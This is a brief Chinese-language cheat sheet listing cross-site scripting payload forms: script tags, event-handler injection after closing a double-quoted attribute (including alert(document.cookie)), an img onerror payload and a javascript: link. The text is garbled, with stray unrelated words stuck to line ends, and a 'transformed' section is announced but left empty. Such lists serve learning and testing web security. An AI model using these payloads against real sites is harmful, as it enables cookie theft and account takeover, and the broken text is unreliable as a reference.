xss的構造方式:javascript
一,尖括號構造 <script>alert(1)</script>java
二,事件構造 "onmouseover="alert(1)cookie
"onfocus="alert(document.cookie)xss
例如:已知輸入點,首先先閉合雙引號,則構造以下語句spa
」 onmouseover="alert(1)" type="textblog
<img src="x" onerror="alert(1)">//屬性須要加雙引號seo
變形以後:事件
三,構造僞協議ip
<a href=javascript:alert(1)>click on!</a>cli